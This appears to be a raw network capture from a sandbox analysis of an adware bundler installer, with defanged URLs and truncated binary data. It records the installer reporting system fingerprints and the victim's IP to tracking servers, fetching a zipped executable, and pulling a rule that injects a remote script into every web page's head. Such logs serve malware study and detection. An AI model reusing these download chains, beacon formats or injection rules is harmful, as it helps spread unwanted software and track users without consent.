alpha=WmVjOTkBcgl8RWo/Zl1XbAYWDRg5LjcpaHhWDQdaL0VDTHIOdQcaChhLJmM/X1REKGAneA==
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:22 GMT
Content-Length: 41
{"status":"OK","url":null,"message":null}HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..Content-Type: text/plain; charset=utf-8..Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP002C2..X-Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Thu, 23 Apr 2015 07:24:22 GMT..Content-Length: 41..{"status":"OK","url":null,"message":null}..
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.regok HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.72 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 2015 07:24:28 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.72 ms","message":"store 1 action and 0 update "}..0......
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.finish HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.66 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 2015 07:24:30 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.66 ms","message":"store 1 action and 0 update "}..0..
GET /s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a.............!.......,...........L..;..
GET /v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2105 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.82 ms","message":"store 2 action and 4 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:25:01 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.82 ms","message":"store 2 action and 4 update "}..0..
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.RegWrite HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.65 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:54 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.65 ms","message":"store 1 action and 0 update "}..0..
POST /namen.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.amoninst.com
Content-Length: 70
Connection: Keep-Alive
campid=9664&i=MyBestOffersTodayBR&prefix=amisetup5755&version=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:05 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 171
Connection: keep-alive
[Data]..exe=amisetup5755.exe..url=hXXp://VVV.downloadcrest.com/tdownload.php..params=version=1.1.2.41&s1=57a0c198e2d39f18102a94c10225f3efec999268&t1=1429774025&campid=9664HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Thu, 23 Apr 2015 07:24:05 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 171..Connection: keep-alive..[Data]..exe=amisetup5755.exe..url=hXXp://VVV.downloadcrest.com/tdownload.php..params=version=1.1.2.41&s1=57a0c198e2d39f18102a94c10225f3efec999268&t1=1429774025&campid=9664..
GET /install.gif?bundle=istartsurf&ptid=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: log.very911.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: Tengine/1.2.2
Date: Thu, 23 Apr 2015 07:24:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 693
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<h1>404 Not Found</h1>..<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>..Please report this message and include the following information to us.<br/>..Thank you very much!</p>..<table>..<tr>..<td>URL:</td>..<td>hXXp://log.very911.com:8080/install.gif?bundle=istartsurf&ptid=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001</td>..</tr>..<tr>..<td>Server:</td>..<td>us-pub00.v9.com</td>..</tr>..<tr>..<td>Date:</td>..<td>2015/04/23 02:24:30</td>..</tr>..</table>..<hr/>Powered by Tengine/1.2.2..</body>..</html>..HTTP/1.1 404 Not Found..Server: Tengine/1.2.2..Date: Thu, 23 Apr 2015 07:24:30 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 693..Connection: keep-alive..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<h1>404 Not Found</h1>..<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>..Please report this message and include the following information to us.<br/>..Thank you very much!</p>..<table>..<tr>..<td>UR
<<< skipped >>>
GET /s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:23:56 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a.............!.......,...........L..;..
GET /mobile/mt-core.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:57 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 18:46:26 GMT
ETag: "1448627-161ce-49dac90326480"
Accept-Ranges: bytes
Content-Length: 90574
Connection: close
Content-Type: application/x-javascript
/*.---.MooTools: the javascript framework..web build:. - hXXp://mootools.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7..packager build:. - packager build Core/Core Core/Array Core/String Core/Number Core/Function Core/Object Core/Event Core/Browser Core/Class Core/Class.Extras Core/Slick.Parser Core/Slick.Finder Core/Element Core/Element.Style Core/Element.Event Core/Element.Dimensions Core/Fx Core/Fx.CSS Core/Fx.Tween Core/Fx.Morph Core/Fx.Transitions Core/Request Core/Request.HTML Core/Request.JSON Core/Cookie Core/JSON Core/DOMReady Core/Swiff..copyrights:. - [MooTools](hXXp://mootools.net)..licenses:. - [MIT License](http://mootools.net/license.txt).....*/.(function(){this.MooTools={version:"1.3.1",build:"af48c8d589f43f32212f9bb8ff68a127e6a3ba6c"};var e=this.typeOf=function(i){if(i==null){return"null";}if(i.$family){return i.$family();.}if(i.nodeName){if(i.nodeType==1){return"element";}if(i.nodeType==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace";}}else{if(typeof i.length=="number"){if(i.callee){return"arguments";.}if("item" in i){return"collection";}}}return typeof i;};var u=this.instanceOf=function(w,i){if(w==null){return false;}var v=w.$constructor||w.constructor;.while(v){if(v===i){return true;}v=v.parent;}return w instanceof i;};var f=this.Function;var r=true;for(var q in {toString:1}){r=null;}if(r){r=["hasOwnProperty","valueOf","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","constructor"];.}f.prototype.overloadSetter=function(v){var i=this;return function(x,w){if(x==null){
<<< skipped >>>
GET /registro/carregando.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:39 GMT
Content-Type: image/gif
Content-Length: 4176
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:39 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a . ........{...........................l..D..N..............L.}...........................6...........z..<..(..,.....v.....".....V........ ....................&........>.....t.................0........B.................Z..$.....~..r..............|.....h..j........`........x........X..2.................*..b..^.....p...........................................................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,.... . ......................)...).4.)...3....*.5..A..9@..... ..&.....<........ ........)KFN....!.......%....."..!'.........,..D......#..6...`xU....-T......A. d .......1.. ...._.r`...A......Q.'.L.pH`A....Q0BKA....1.......F..`...c.pdld......(.`b.....R.p"...a.=xa!./{..6...B...?6.%b..Ru$`..2$....6dC..E.c!F(C.A.S.%hE.......@.. ...$'rbP..I.)D.v.........(....wFj..2....3>X.p@..cF<.:..I....T.....#.JD'.7....-.MK...%&...`...@.!.......,.... . ............TT).......I((K/.....4F....F......K....I........AFL..FA.....(.XMDF..%....$..:(NI..........<....<(0.6[C..I...B!.$.EZ..3...Q.8.$..8V r`B."..o.n.)....O.`0..L..'."(H..c#.....B..?..081....[0........' .B......~` A....FB(......M;z.".D<......bC....t1J...'U.j......!....$.......u.......8.{e..#Q........%.UP.N..(N.....D.&.....$s..`G...eJ&.8D0.. A.....).....K.j..E....<H1."..B.j.:...N.<z...c..! @..b.c..!sP...H.......!.......,.... . ..................E]A......K.5F#.....O ..%@-............>@L..:...D.8'....N.[.<.-\..Q.'["&../_...%%:..M...O..%...T...:.&9A*G.,.N.&......J.......T.`.......s....B.Np.!...'..(.....
<<< skipped >>>
POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.amoninst.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 309
Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=B3920CF566AB717F84CE9CE32F62B904&Sysid1=B3920CF566AB717F84CE9CE32F62B904&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=9664&exe=amisetup5755__9664&ffver=&i=MyBestOffersTodayBR&lang_DfltUser=0409&netfs=3&s=Y&ts=1429773854&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:25 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
15d1.... .. ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=UTF-8" /> ..<title>Installer</title>..<base href="hXXp://VVV.amoninst.com:80/index.php" />..<script type="text/javascript" src="hXXp://cdn1.downloadcrest.com/V19/amipb.js"></script>..<script type="text/javascript">..var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_additional_offer_list = '0';..var g_finish_install_button = '0';..var g_popup_install_all = '0';..var g_eula = ''; ..var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3';..var g_icon = '';..var g_comps = [], g_pages = [], c, g_curPage = -1;..var g_cid = '9664';..var g_tid = '';..var g_cc = 'UA';..var g_lang = 'en';..var g_ip = '37.57.16.189';..var g_browser = 'ie';..var g_cnt = '3ad80c247cbd60f855b8cf1954a59b1b';..var g_ver = '1.1.2.41';..var g_buttonImage = 1;..var g_thanks = 'thankyou.php';..var g_images = [];..var g_purl = 'hXXp://VVV.amoninst.com:80/pix.php';..var g_skipCats = 0;..var g_ieVer = '6.0';..var g_chVer = '';..var g_ffVer = '';..var g_netfs = -31;..var g_vert = 3;..var g_os = "NT5.1SP3";..var g_current_screen = '';..var g_custom_next_button_event = '0';..var g_custom_next_button = '0';..var g_install_all = 0;....function InitInstall()..{.. g_ami.AddThanksParameter('tid', g_tid);..
<<< skipped >>>
POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.amoninst.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 229
Connection: Keep-Alive
Cache-Control: no-cache
_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_updater=0&r_MyBestOffersTodayBR=0.01&updater=3&MyBestOffersTodayBR=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 23 Apr 2015 07:24:28 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 2409
Connection: keep-alive
....<Array><page><f>1</f><fb>1</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><must_show>0</must_show><bdy>PGRpdiBjbGFzcz0iY2xhc3MtMWxpbmVyIj48ZGl2IGNsYXNzPSJjaGVjay1ob2xkZXIiPjxkaXYgY2xhc3M9ImNsYXNzLWNoZWNrLTEiIGlkPSJhbWlfY2hlY2tfTXlCZXN0T2ZmZXJzVG9kYXlCUiIgb25jbGljaz0iQW1pQ2hlY2tDdHJsQ2xpY2tlZCgpIj4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgaWQ9ImlfYW1pX015QmVzdE9mZmVyc1RvZGF5QlIiIG5hbWU9Ik15IEJlc3QgT2ZmZXJzIFRvZGF5IiB0eXBlPSJoaWRkZW4iIHZhbHVlPSIxIiAvPjwvZGl2PjxkaXYgY2xhc3M9ImNsYXNzLWxpbmUxIj48c3Bhbj5UT0RPUyBPUyBESUFTIFVNQSBPRkVSVEEhPC9zcGFuPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9ImNsYXNzLWxpbmUyIj48c3Bhbj5CeSBDbGlja2luZyAiTmV4dCIgb3IgIkluc3RhbGwiLCBJIGFncmVlIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vZ29vLmdsL25pMm1yZSIgdGFyZ2V0PSJfYmxhbmsiPlRlcm1zIG9mIFNlcnZpY2U8L2E IGFuZCA8YSBocmVmPSJodHRwOi8vZ29vLmdsL1NIcDhSZyIgdGFyZ2V0PSJfYmxhbmsiPlByaXZhY3kgUG9saWN5PC9hPiBhbmQgY29uc2VudCB0byBpbnN0YWxsIE15IEJlc3QgT2ZmZXJzIFRvZGF5Ljwvc3Bhbj48L2Rpdj48L2Rpdj48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iMSIgaWQ9ImlfYW1pX3VwZGF0ZXIiLz48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0idXBkYXRlcixNeUJlc3RPZmZlcnNUb2RheUJSIiBpZD0iYWxsX3Nob3J0X25hbWVzIi8 </bdy><img>__empty__</img></page><page><f>1</f><fb>0</fb><pt>1</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><must_show>0</must_show><bdy>DQo8
<<< skipped >>>
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.amoninst.com
Connection: Keep-Alive
Content-Length: 1340
_srvlog=&browser=ie&c[MyBestOffersTodayBR][r]=0.01&c[MyBestOffersTodayBR][s]=-1&c[updater][r]=0&c[updater][s]=-1&capp=updater&cc=UA&cid=9664&clip=37.57.16.189&cmdl=amisetup5755__9664.exe /s /ver 1.1.2.41 /u http://VVV.amoninst.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR&cnt=3ad80c247cbd60f855b8cf1954a59b1b¤t_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT5.1SP3&sysid=B3920CF566AB717F84CE9CE32F62B904&sysid1=B3920CF566AB717F84CE9CE32F62B904&te=1429773860&tid=&ts=1429773854&ver=1.1.2.41&vert=3&mh=91c1b2cbe72cfa41cf10f8484f47dffe909b4dcf&base=_srvlog=&browser=ie&c%5BMyBestOffersTodayBR%5D%5Br%5D=0.01&c%5BMyBestOffersTodayBR%5D%5Bs%5D=-1&c%5Bupdater%5D%5Br%5D=0&c%5Bupdater%5D%5Bs%5D=-1&capp=updater&cc=UA&cid=9664&clip=37.57.16.189&cmdl=amisetup5755__9664.exe+%2Fs++%2Fver+1.1.2.41++%2Fu+http%3A%2F%2FVVV.amoninst.com%2Findex.php+%2Fta+%2Fci+9664+%2Fi+MyBestOffersTodayBR&cnt=3ad80c247cbd60f855b8cf1954a59b1b¤t_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT5.1SP3&sysid=B3920CF566AB717F84CE9CE32F62B904&sysid1=B3920CF566AB717F84CE9CE32F62B904&te=1429773860&tid=&ts=1429773854&ver=1.1.2.41&vert=3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:29 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Thu, 23 Apr 2015 07:24:29 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...... ....
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.dlzip1.istartsurf.finish,9 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:17 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.....H.....0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 2015 07:24:17 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..Content-Encoding: gzip..57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.....H.....0..
GET /services/rules.txt?dummy=243 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/plain
Content-Length: 180
Connection: keep-alive
Last-Modified: Thu, 26 Mar 2015 16:45:36 GMT
ETag: "57c94d-b4-51233beb94c00"
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js"></script></head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/services/script.js" type="text/javascript"></script>.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:37 GMT..Content-Type: text/plain..Content-Length: 180..Connection: keep-alive..Last-Modified: Thu, 26 Mar 2015 16:45:36 GMT..ETag: "57c94d-b4-51233beb94c00"..P3P: CP="Potato"..X-Cache: MISS..X-Server: Provided by Intermedia..X-Country: EU..Accept-Ranges: bytes..</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js"></script></head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/services/script.js" type="text/javascript"></script>.....
GET /services/update.php?v=1.2.0&key=FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX&dummy=708 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:38 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:38 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia..X-Country: EU..
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.hp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.56 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 2015 07:24:28 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.56 ms","message":"store 1 action and 0 update "}..0..
GET /3517/2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 23 Apr 2015 04:24:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Location: hXXp://VVV.tjepgz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
0......
GET /files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 04:24:07 GMT
Content-Type: application/zip
Content-Length: 2975087
Last-Modified: Tue, 14 Apr 2015 08:23:03 GMT
Connection: keep-alive
ETag: "552cce67-2d656f"
Accept-Ranges: bytes
PK...........F................479.db.../.u.>p..m....<..A#.<y....\..-2...a7."....}.zx....(....N.J8...t.J.-Q..C$....G.!;Q`..%...D.>uZ....s.L........* ...i.5A.`.....j._\.....e.M. ..}.....\.3.[......m.....Z......5oV.Q7..c.x......U...5...........6OsxTJniPK..........bF]=..............wpm_v20.0.0.1953_0302.exe..S.nM....m....m..m..m..l..m.:.\...E....s{.*F.5j.......z.......T.C.t.f.,f..y.^.a.....P.3.O^:.~L....(.......Z..,...R...xN......*g...2.._.i.y..A[7..K%...W... Jn.ET.d3.8.A.Rpi>..E..}.......Eb.L/..../.Q.../..q...........[.VZ..4_..J.4.(...{..SQ....f....*.....1.}BO..........gD..?..|od...W..].6..a.E....*Rz...&...G.....5.dW ..nD7&..4C2......zb.Be..[....T(b...rj..4X....g........u>Y..~..D!...5.Z...w.....w.[...N......M.........i....l..3..."..W7.D.t.........Cv.r.-........N..1..B...<.......zI.......G.F#Al...;..L..[.j.g.w._...~z.../......s...h]..R........K...1....v}~..].....Rd]?a....#.".]r..-..x....Z...z|`.......x..)..4/...........N..aQG...lq.4`..`....d>.....wGyf.q.RzN.....9,.t.Rr..=......M.%....l[>..Bt.<...D..G..S4.$s.g..... ...Y.N.h`..Y...3.5.m."..Pfc%j..$.....R...J..i..x...?J.T.)L..@%......F9..L.#..`}7....q.%....sj.]. ...r.../z..Ff.<x-b.d..P..pE..l`k.?:n..Aq.....<..F.....^..r...7.b\....}.,$.p)<..Q.....U.>.D.....@}4u.....N....#..A 4g2.uU.r}"......#X....d.{.)..........R..m.DR.d.2.......o#....30O......(g(H.Aro...0.P....tt5.7@W4;....BR.J1^Lf....H'..q...HMA..of.]w#..?..I..~>FL2.T.v:.&\..${.KB......o.Z.R.&.<....Zf)...".D<...@_.....WE....*.[\.b..W._?.S{.x..,....pP...qC\. ....zC...
<<< skipped >>>
